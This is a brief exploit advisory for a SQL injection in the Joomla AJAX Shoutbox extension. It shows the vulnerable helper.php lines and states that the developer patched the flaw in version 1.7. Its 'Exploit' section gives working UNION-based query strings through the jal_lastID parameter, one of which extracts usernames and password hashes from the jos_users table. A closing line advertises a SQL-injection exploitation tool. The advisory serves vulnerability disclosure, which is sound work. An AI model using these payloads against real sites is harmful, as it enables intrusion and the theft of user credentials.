Joomla AJAX Shoutbox remote SQL Injection vulnerability
[-] Author: Ibrahim Raafat
[-] Contact: https://twitter.com/RaafatSEC
[-] Discovery date: 1 April 2010 [ 4 years ago ]
[-] Reported to vendor : 12 March 2014
[-] Response: Quick response from the developer, Patched and released version 1.7 in the same day
[-] Download: http://extensions.joomla.org/extensions/communication/shoutbox/43
[+] Details:
[-] include "helper.php";
[-] parameter: jal_lastID
[-] Code:
113 $jal_lastID = JRequest::getVar( 'jal_lastID', 0 );
115 $query = 'SELECT * FROM #__shoutbox WHERE id > '.$jal_lastID.' ORDER BY id DESC';
[-] Exploit:
?mode=getshouts&jal_lastID=1337133713371337+union+select+column,2,3,4,5,6+from+table-- -
?mode=getshouts&jal_lastID=1337133713371337+union+select+group_concat(username,0x3a,password),1,1,1,1,1+from+jos_users-- -
[+] An amazing tool to discover and exploit SQL Injection vulnerability [ Sculptor - sculptordev.com ]
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